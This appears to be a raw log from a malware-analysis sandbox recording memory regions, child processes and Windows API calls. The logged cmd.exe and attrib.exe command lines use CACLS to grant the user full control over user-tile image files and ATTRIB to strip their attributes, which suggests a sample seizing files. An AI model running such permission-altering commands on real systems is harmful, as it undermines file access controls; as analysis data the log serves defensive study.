entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26837 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26838 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26839 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 26840 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26841 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26842 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26843 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26844 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26845 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 26846 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26847 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26848 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26849 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26850 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26851 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26852 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 551 os_tid = 0xebc Thread: id = 552 os_tid = 0xe74 Process: id = "387" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0x408" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "385" os_parent_pid = "0x128" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26853 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26854 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26855 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26856 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26857 start_va = 0xb00000 end_va = 0xb06fff entry_point = 0xb00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26858 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26859 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26861 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26862 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26863 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" 
Region: id = 26864 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26865 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26866 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26867 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 26868 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26869 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26870 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26871 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26872 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26873 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: 
"c:\\windows\\system32\\advapi32.dll") Region: id = 26874 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26875 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26876 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26877 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26878 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26879 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26880 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 26881 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26882 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 553 os_tid = 0xeb4 Process: id = "388" image_name = 
"cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26883 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26884 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26885 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26886 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 26887 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26888 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 26889 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26890 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26891 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26892 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26893 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26894 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26895 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26896 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26897 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 26898 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26899 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 26900 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26901 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26902 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26903 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26904 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26905 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26906 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26907 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 26908 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26909 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26910 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26911 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26912 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26913 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26914 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 26915 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 26916 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 26917 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 554 os_tid = 0xd68 [0186.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7d4 | out: lpSystemTimeAsFileTime=0x22f7d4*(dwLowDateTime=0xa4478420, dwHighDateTime=0x1d440a9)) [0186.850] GetCurrentProcessId () returned 0xfac [0186.850] GetCurrentThreadId () returned 0xd68 [0186.850] GetTickCount () returned 0x355dc [0186.850] QueryPerformanceCounter (in: lpPerformanceCount=0x22f7cc | out: lpPerformanceCount=0x22f7cc*=24363966215) returned 1 [0186.851] GetModuleHandleA 
(lpModuleName=0x0) returned 0x4a9c0000 [0186.851] __set_app_type (_Type=0x1) [0186.851] __p__fmode () returned 0x76b331f4 [0186.851] __p__commode () returned 0x76b331fc [0186.851] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.851] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.852] GetCurrentThreadId () returned 0xd68 [0186.852] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0186.852] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.852] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.852] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.852] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.852] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f764 | out: phkResult=0x22f764*=0x0) returned 0x2 [0186.852] VirtualQuery (in: lpAddress=0x22f79b, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x133000, 
lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.852] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f734, dwLength=0x1c | out: lpBuffer=0x22f734*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0186.852] GetConsoleOutputCP () returned 0x1b5 [0186.852] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.852] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.853] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.853] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.853] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.853] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.853] GetEnvironmentStringsW () returned 0x2c0308* [0186.853] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.854] GetEnvironmentStringsW () returned 0x2c0308* [0186.854] FreeEnvironmentStringsW (penv=0x2c0308) returned 1 [0186.854] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6d4 | out: phkResult=0x22e6d4*=0x40) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, 
lpData=0x22e6e0*=0xb8, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x0, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegCloseKey (hKey=0x40) returned 0x0 [0186.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6d4 | out: phkResult=0x22e6d4*=0x40) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x40, lpcbData=0x22e6d8*=0x1000) returned 0x2 
[0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x1, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x0, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x4, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x4) returned 0x0 [0186.854] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6dc, lpData=0x22e6e0, lpcbData=0x22e6d8*=0x1000 | out: lpType=0x22e6dc*=0x0, lpData=0x22e6e0*=0x9, lpcbData=0x22e6d8*=0x1000) returned 0x2 [0186.854] RegCloseKey (hKey=0x40) returned 0x0 [0186.854] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0186.854] srand (_Seed=0x5b886395) [0186.854] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" [0186.854] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp\"" [0186.855] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.855] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0186.855] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.855] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.855] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0186.855] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0186.855] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0186.855] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0186.855] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0186.856] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0186.856] GetEnvironmentStringsW () returned 0x2c2458* [0186.856] FreeEnvironmentStringsW (penv=0x2c2458) returned 1 [0186.856] GetEnvironmentVariableW (in: lpName="COMSPEC", 